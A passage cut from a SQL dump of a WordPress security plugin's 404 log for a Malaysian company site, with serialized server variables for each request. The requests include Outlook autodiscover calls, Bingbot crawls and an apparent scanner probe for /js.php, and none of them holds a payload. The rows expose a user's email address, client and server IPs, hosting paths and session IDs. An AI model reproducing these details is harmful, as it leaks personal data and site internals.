SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0wVoxV0SvqUWaw3AGHkgAAAVY\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0wVoxV0SvqUWaw3AGHkgAAAVY\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582615.0676\";s:12:\"REQUEST_TIME\";s:10:\"1570582615\";}}','notice','2019-10-09 00:56:57','2019-10-09 00:56:55',35397152,37190088,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27746,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:47:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/autodiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"353\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:2:\"en\";s:22:\"HTTP_CLIENT_REQUEST_ID\";s:38:\"{CC4ED115-3472-4578-8886-2C8187126988}\";s:15:\"HTTP_CONNECTION\";s:10:\"keep-alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"MacOutlook/16.29.0.190908 (Intelx64 Mac OS X Version 10.14.6 (Build 18G103))\";s:32:\"HTTP_X_AUTODISCOVERARCHIVEASSMTP\";s:4:\"true\";s:23:\"HTTP_X_CLIENTSTATISTICS\";s:93:\"DeviceID=F0686271-88A1-564F-9A8A-8219BFC1DA2C; SessionID=3D9FA7CF-2F8E-4567-981E-05FADAFBA255\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:20:\"HTTP_X_USER_IDENTITY\";s:20:\"fatin@bintara.com.my\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0wU4xV0SvqUWaw3AGHkAAAAVI\";s:12:\"REDIRECT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:14:\"115.132.144.59\";s:11:\"REMOTE_PORT\";s:5:\"53518\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/autodiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/autodiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0wU4xV0SvqUWaw3AGHkAAAAVI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582611.9268\";s:12:\"REQUEST_TIME\";s:10:\"1570582611\";}}','notice','2019-10-09 00:56:53','2019-10-09 00:56:52',35398864,37205240,'https://bintara.com.my/autodiscover/autodiscover.xml',1,0,'115.132.144.59'),(27745,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:52:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:16:\"HTTP_ACCEPT_AUTH\";s:21:\"badger,Wlid1.1,Bearer\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:21:\"HTTP_X_FEATUREVERSION\";s:1:\"1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:29:\"HTTP_X_MS_COOKIEURI_REQUESTED\";s:1:\"t\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9ACCDB06-7A30-46B0-A94A-2AA3CA6E0A04\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0vGCFP7p535BJctBaKmQAAAEk\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"110.159.79.9\";s:11:\"REMOTE_PORT\";s:5:\"64600\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0vGCFP7p535BJctBaKmQAAAEk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582296.9727\";s:12:\"REQUEST_TIME\";s:10:\"1570582296\";}}','notice','2019-10-09 00:51:39','2019-10-09 00:51:37',35788424,37578248,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'110.159.79.9');
INSERT INTO `wpdp_itsec_logs` (`id`, `parent_id`, `module`, `code`, `data`, `type`, `timestamp`, `init_timestamp`, `memory_current`, `memory_peak`, `url`, `blog_id`, `user_id`, `remote_ip`) VALUES (27744,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:49:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:30:\"/AutoDiscover/autodiscover.xml\";s:14:\"CONTENT_LENGTH\";s:3:\"317\";s:12:\"CONTENT_TYPE\";s:23:\"text/xml; charset=utf-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:72:\"Microsoft Office/16.0 (Windows NT 10.0; Microsoft Excel 16.0.11929; Pro)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:25:\"HTTP_X_OFFICE_APPLICATION\";s:1:\"1\";s:27:\"HTTP_X_OFFICE_AUDIENCEGROUP\";s:8:\"Insiders\";s:27:\"HTTP_X_OFFICE_MAJOR_VERSION\";s:2:\"16\";s:22:\"HTTP_X_OFFICE_PLATFORM\";s:5:\"Win32\";s:23:\"HTTP_X_OFFICE_SESSIONID\";s:36:\"9ACCDB06-7A30-46B0-A94A-2AA3CA6E0A04\";s:21:\"HTTP_X_OFFICE_VERSION\";s:10:\"16.0.11929\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:19:\"REDIRECT_SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0vGHs0xjDTAaZG0-igOQAAAJE\";s:12:\"REDIRECT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"REMOTE_ADDR\";s:12:\"110.159.79.9\";s:11:\"REMOTE_PORT\";s:5:\"64629\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:52:\"https://bintara.com.my/AutoDiscover/autodiscover.xml\";s:10:\"SCRIPT_URL\";s:30:\"/AutoDiscover/autodiscover.xml\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0vGHs0xjDTAaZG0-igOQAAAJE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570582296.9682\";s:12:\"REQUEST_TIME\";s:10:\"1570582296\";}}','notice','2019-10-09 00:51:38','2019-10-09 00:51:37',35398232,37194040,'https://bintara.com.my/AutoDiscover/autodiscover.xml',1,0,'110.159.79.9'),(27743,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/toughpad-fz-g1/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_FROM\";s:24:\"bingbot(at)microsoft.com\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-g1/\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/toughpad-fz-g1/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZ0fqd4C-iQURXDNrGgMkwAAAVg\";s:12:\"REDIRECT_URL\";s:16:\"/toughpad-fz-g1/\";s:11:\"REMOTE_ADDR\";s:13:\"207.46.13.110\";s:11:\"REMOTE_PORT\";s:4:\"1123\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/toughpad-fz-g1/\";s:10:\"SCRIPT_URL\";s:16:\"/toughpad-fz-g1/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0fqd4C-iQURXDNrGgMkwAAAVg\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570578345.7608\";s:12:\"REQUEST_TIME\";s:10:\"1570578345\";}}','notice','2019-10-08 23:45:47','2019-10-08 23:45:46',33978816,35787328,'https://bintara.com.my/toughpad-fz-g1/',1,0,'207.46.13.110'),(27742,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:45:\"/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:63:\"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.5\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:8:\"HTTP_DNT\";s:1:\"1\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:130:\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Iridium/2018.4 Safari/537.36 Chrome/66.0.3359.130\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:43:\"page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"195.154.57.70\";s:11:\"REMOTE_PORT\";s:5:\"54908\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:23:\"https://bintara.com.my/\";s:10:\"SCRIPT_URL\";s:1:\"/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZ0LW9PENg31N0h34jA7sAAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570573147.8176\";s:12:\"REQUEST_TIME\";s:10:\"1570573147\";}}','notice','2019-10-08 22:19:10','2019-10-08 22:19:08',35428400,37232208,'https://bintara.com.my/?page_id=18&long=1&button=%E6%9F%A5%E8%AF%A2',1,0,'195.154.57.70'),(27741,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:22:\"/blog/tag/logitech-vc/\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_ENCODING\";s:13:\"gzip, deflate\";s:18:\"HTTP_CACHE_CONTROL\";s:8:\"no-cache\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:11:\"HTTP_PRAGMA\";s:8:\"no-cache\";s:15:\"HTTP_USER_AGENT\";s:71:\"Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:19:\"REDIRECT_SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZz6TdPENg31N0h34jA1RQAAAM4\";s:12:\"REDIRECT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"REMOTE_ADDR\";s:13:\"157.55.39.227\";s:11:\"REMOTE_PORT\";s:4:\"9905\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:44:\"https://bintara.com.my/blog/tag/logitech-vc/\";s:10:\"SCRIPT_URL\";s:22:\"/blog/tag/logitech-vc/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZz6TdPENg31N0h34jA1RQAAAM4\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570568781.2452\";s:12:\"REQUEST_TIME\";s:10:\"1570568781\";}}','notice','2019-10-08 21:06:23','2019-10-08 21:06:21',34371360,36172544,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'157.55.39.227'),(27740,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:69:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:7:\"/js.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:5:\"205-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:5:\"205-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:5:\"205-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/js.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:7:\"/js.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"XZzw@NPENg31N0h34jAxCAAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/js.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/js.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XZzw@NPENg31N0h34jAxCAAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:14:\"91.203.146.130\";s:11:\"REMOTE_PORT\";s:5:\"48042\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"https://bintara.com.my/js.php\";s:10:\"SCRIPT_URL\";s:7:\"/js.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XZzw@NPENg31N0h34jAxCAAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1570566392.9314\";s:12:\"REQUEST_TIME\";s:10:\"1570566392\";}}','notice','2019-10-08 20:26:35','2019-10-08 